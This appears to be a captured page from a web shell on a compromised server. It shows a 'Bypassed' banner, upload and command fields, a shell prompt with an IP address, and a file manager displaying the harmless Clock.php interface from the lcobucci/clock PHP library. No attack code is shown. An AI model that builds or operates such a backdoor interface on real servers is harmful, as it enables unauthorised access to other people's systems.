404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.137.186.186: ~ $
<?php
declare(strict_types=1);

namespace Lcobucci\Clock;

use DateTimeImmutable;
use Psr\Clock\ClockInterface;

interface Clock extends ClockInterface
{
    public function now(): DateTimeImmutable;
}

Filemanager

Name Type Size Permission Actions
Clock.php File 202 B 0644
FrozenClock.php File 539 B 0644
SystemClock.php File 637 B 0644